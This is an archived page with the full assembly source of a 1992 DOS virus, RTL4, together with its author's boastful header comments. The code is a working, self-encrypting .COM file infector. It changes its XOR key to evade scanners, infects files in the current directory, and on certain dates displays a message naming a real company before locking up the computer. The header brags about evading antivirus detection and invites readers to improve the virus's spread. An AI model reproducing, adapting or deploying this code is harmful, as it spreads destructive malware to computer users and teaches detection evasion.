home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
HPAVC
/
HPAVC CD-ROM.iso
/
SOURCE.ZIP
/
RTL4.ASM
< prev
next >
Wrap
Assembly Source File
|
1992-11-29
|
12KB
|
266 lines
;******************************************************************************
;
; RTL4 / WEDDEN DAT... VIRUS
;
;******************************************************************************
;
; "If a weaking linkage found, eliminate...
; Hear the cities fearfull roar!"
;
; Now in front of you lies another source of a virus. It is not a very good
; one, but, as you might say, a virus is a virus. After my wake at the PC, I
; created several viruses, like:
;
; Deicide / Glenn
; Morgoth
; Breeze
; Brother
; Commentator I
; Commentator II
; Spawnie
; Xmas
; 1St_Star / 222
; T-1000
;
; Well, I bet you think this is a whole lot, but some are minor variants, for
; which I don't have the guts to publish the source code. I have to admid,
; Deicide and Morgoth have spread very well. I uploaded them to a BBS and it
; was downloaded several times, and it is not detected by antivirus program yet.
; Deicide is now detectable, but that was my first attempt to make a virus.
;
; This virus is a Non-Resident Direct Action .COM Infector.
; It only infects files in the current directory.
; You can recognize a infected file simply, the 4th byte is a '*' (just like
; the 1St_Star virus). It is inactive from January till May and starts
; replicating from May. After July, every Wednessday after the 21st the
; program will hang the system, showing the address of RTL4 Joop v/d Ende
; Productions.
;
; Disclaimer : This program is like all other virus sources only for
; educational purposes and should not be given to irresponsible hands
; (John McAfee and people like him).
;
; For the criminal reader : Don't just change the text of this virus and
; say you made a virus. Instead use some ideas from this virus and create your
; own virus if you want to be nasty. Additions to this virus that makes it
; spreading faster and makes it harder to detect are welcome, as long as I get
; the new source code.
;
; I want to thank several virus writers for their support with letting McAfee
; and Ass. earn his money with making so many updates of SCAN...
; Here they are : Bit Addict, XSTC, Dark Helmet, Dark Avenger, Nuke!, Cracker
; Jack and many more creators.
;
; Note to XSTC : Thank you for disassembling the Deicide virus, for I have lost
; the source code. Next time write a message, because I might have the source
; code of the virus ready, but not uploaded. It saves you time, so you may
; disassemble another virus (ofcourse only for educational purposes ;-) )
;
; Now have fun with this virus, written in A86 assembler version 3.22
;
; Glenn Benton
;
; "Is it truly a disembodied head lurking in the dark of the tombs of fate?"
;
Org 0h ; The outcome will be .BIN
Start: Jmp MainVir ; Jump to main virus
Db '*' ; signature
MainVir: Call On1 ; Get virus offset
On1: Pop BP ; BP is the index register
Sub BP,Offset MainVir+3 ; Calculate virus offset
Push Ax ; And store AX (error reg.)
Lea Si,Crypt[BP] ; Decryptor for the
Mov Di,Si ; virus code. It's long
Mov Cx,CryptLen ; for a decoder, but it
Decrypt: Lodsb ; reduces the recognizable
Xor Al,0 ; part enough.
Stosb ;
Loop Decrypt ;
DecrLen Equ $-MainVir ; Decryptor length
Crypt: Mov Ax,Cs:OrgPrg[BP] ; Store the 4 first bytes
Mov Bx,Cs:OrgPrg[BP]+2 ; of the host
Mov Cs:Start+100h,Ax ;
Mov Cs:Start[2]+100h,Bx ;
Mov Ah,2ah ; Get date
Int 21h ; If it is a wednessday
Cmp Dh,8 ; after July and after
Jb NoMsg ; the 21st, it will
Cmp Dl,22 ; will continue, else
Jb NoMsg ; it goes to NoMsg
Cmp Al,3 ;
Jne NoMsg ;
Mov Ah,9 ; Display the message
Lea Dx,Msg[BP] ;
Int 21h ;
Lockout: Cli ; And lock the computer
Jmp Lockout ;
NoMsg: Cmp Dh,5 ; Is it after April?
Jae DoVirus ; Yes - Replicate
Jmp Ready ; No - Terminate to host
DoVirus: Mov Ah,1ah ; Move DTA to a safe place
Mov Dx,0fc00h ; $FE00
Int 21h
Mov Ah,4eh ;
Search: Lea Dx,FileSpec[BP] ; Search for a .COM file in
Xor Cx,Cx ; the current directory
Int 21h ;
Jnc Found ; If not exist, goto Ready
Jmp Ready ; else goto Found
Found: Mov Ax,4300h ; Get file attributes
Mov Dx,0fc1eh ; and store them on the stack
Int 21h ;
Push Cx ;
Mov Ax,4301h ; Wipe the attributes, so it
Xor Cx,Cx ; is accessable for us
Int 21h ;
Mov Ax,3d02h ; Open the file with
Int 21h ; read/write priority
Mov Bx,5700h ; Get de file date/time stamp
Xchg Ax,Bx ; and store them on the stack
Int 21h ;
Push Cx ;
Push Dx ;
Mov Ah,3fh ; Read the first 4 bytes
Lea Dx,OrgPrg[BP] ; of the program
Mov Cx,4 ;
Int 21h ;
Mov Ax,Cs:[OrgPrg][BP] ; Is it a weird EXE?
Cmp Ax,'MZ' ; Yes goto ExeFile
Je ExeFile ;
Cmp Ax,'ZM' ; Is it a normal EXE?
Je ExeFile ; Yes, goto ExeFile
Mov Ah,Cs:[OrgPrg+3][BP] ; Is it already infected?
Cmp Ah,'*' ; No, goto Infect
Jne Infect ;
ExeFile: Call Close ; Call File close
Mov Ah,4fh ; Jump to the search routine
Jmp Search ; again for a .COM file
FSeek: Xor Cx,Cx ; Subroutine for jumping to
Xor Dx,Dx ; the begin/end of file
Int 21h ;
Ret ;
Infect: Mov Ax,4202h ; Jump to EOF
Call FSeek ;
Sub Ax,3 ; Calculate new virus offset
Mov Cs:CallPtr[BP]+1,Ax ;
Mov Ah,2ch ; Get system time
Int 21h ;
Mov Cs:Decrypt+2[BP],Dl ; Move the decryptor part
Lea Si,MainVir[BP] ; with the 100ds second put
Mov Di,0fd00h ; into the XOR command to
Mov Cx,DecrLen ; the end of the 64K segment
Rep Movsb ;
Lea Si,Crypt[BP] ; Encrypt the virus with
Mov Cx,CryptLen ; the 100ds seconds.
Encrypt: Lodsb ; Merge it behind the
Xor Al,Dl ; decryptor
Stosb ;
Loop Encrypt ;
Mov Ah,40h ; Write the virus
Lea Dx,0fd00h ; at the end of the
Mov Cx,VirLen ; file
Int 21h ;
Mov Ax,4200h ; Move to start of
Call FSeek ; the file
Mov Ah,40h ; Write the jump to the virus
Lea Dx,CallPtr[BP] ; at the begin of the file
Mov Cx,4 ;
Int 21h ;
Call Close ; Close the file
Ready: Mov Ah,1ah ; Restore the DTA to the
Mov Dx,80h ; original offset
Int 21h ;
Pop Ax ; Get (possible) error code
Mov Bx,100h ; Strange jump (but nice) to
Push Cs ; the begin of the program
Push Bx ; (which has been restored)
Retf ;
Close: Pop Si ; A pop which is stupid
Pop Dx ; Restore files date/time
Pop Cx ; stamp
Mov Ax,5701h ;
Int 21h ;
Mov Ah,3eh ; Close file
Int 21h ;
Mov Ax,4301h ; Restore attributes
Pop Cx ;
Mov Dx,0fc1eh ;
Int 21h ;
Push Si ; A push which is stupid
Ret ; Return to caller
CallPtr Db 0e9h,0,0 ; Jump
FileSpec Db '*.COM',0 ; Filesearch spec & signature
; Activation message
Msg Db 13,10,9,9,'RTL4'
Db 13,10,'Joop van den Ende Produkties BV'
Db 13,10,'Marco Daas (Casting Assistent)'
Db 13,10,'Postbus 397'
Db 13,10,'1430 AJ AALSMEER'
Db 13,10,'van Cleeffkade 15'
Db 13,10,'1413 BA AALSMEER'
Db 13,10,'The Netherlands'
Db 13,10,10,'Wedden dat... je een virus hebt?'
Db 13,10,'$'
; First 4 bytes of the host program
OrgPrg: Int 20h
DB 'GB' ; My initials (Glenn Benton)
CryptLen Equ $-Crypt ; Length of encrypted part
VirLen Equ $-MainVir ; Length of virus
;
; Sleep well, sleep in hell...
;
; ─────────────────────────────────────────────────────────────────────────
; ────────────────────> and Remember Don't Forget to Call <────────────────
; ────────────> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <──────────
; ─────────────────────────────────────────────────────────────────────────
